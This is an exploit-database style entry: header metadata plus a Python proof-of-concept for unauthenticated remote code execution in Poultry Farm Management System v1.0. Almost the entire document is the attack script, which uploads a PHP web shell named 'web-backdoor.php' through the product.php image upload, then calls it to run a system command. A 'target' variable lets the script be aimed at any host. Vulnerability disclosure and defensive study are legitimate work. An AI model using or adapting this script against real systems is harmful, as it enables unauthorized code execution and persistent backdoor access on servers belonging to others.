# Exploit Title: Poultry Farm Management System v1.0 - Remote Code Execution (RCE)# Date: 24-06-2024# CVE: N/A (Awaiting ID to be assigned)# Exploit Author: Jerry Thomas (w3bn00b3r)# Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip# Github - https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/# Category: Web Application# Version: 1.0# Tested on: Windows 10 | Xampp v3.3.0# Vulnerable endpoint: http://localhost/farm/product.phpimport requests
from colorama import Fore, Style, init
# Initialize colorama
init(autoreset=True)defupload_backdoor(target):
upload_url =f"{target}/farm/product.php"
shell_url =f"{target}/farm/assets/img/productimages/web-backdoor.php"# Prepare the payload
payload ={'category':'CHICKEN','product':'rce','price':'100','save':''}# PHP code to be uploaded
command ="hostname"
data =f"<?php system('{command}');?>"# Prepare the file data
files ={'productimage':('web-backdoor.php', data,'application/x-php')}try:print("Sending POST request to:", upload_url)
response = requests.post(upload_url, files=files, data=payload,
verify=False)if response.status_code ==200:print("\nResponse status code:", response.status_code)print(f"Shell has been uploaded successfully: {shell_url}")# Make a GET request to the shell URL to execute the command
shell_response = requests.get(shell_url, verify=False)print("Command output:", Fore.GREEN +
shell_response.text.strip())else:print(f"Failed to upload shell. Status code:{response.status_code}")print("Response content:", response.text)except requests.RequestException as e:print(f"An error occurred: {e}")if __name__ =="__main__":
target ="http://localhost"# Change this to your target
upload_backdoor(target)
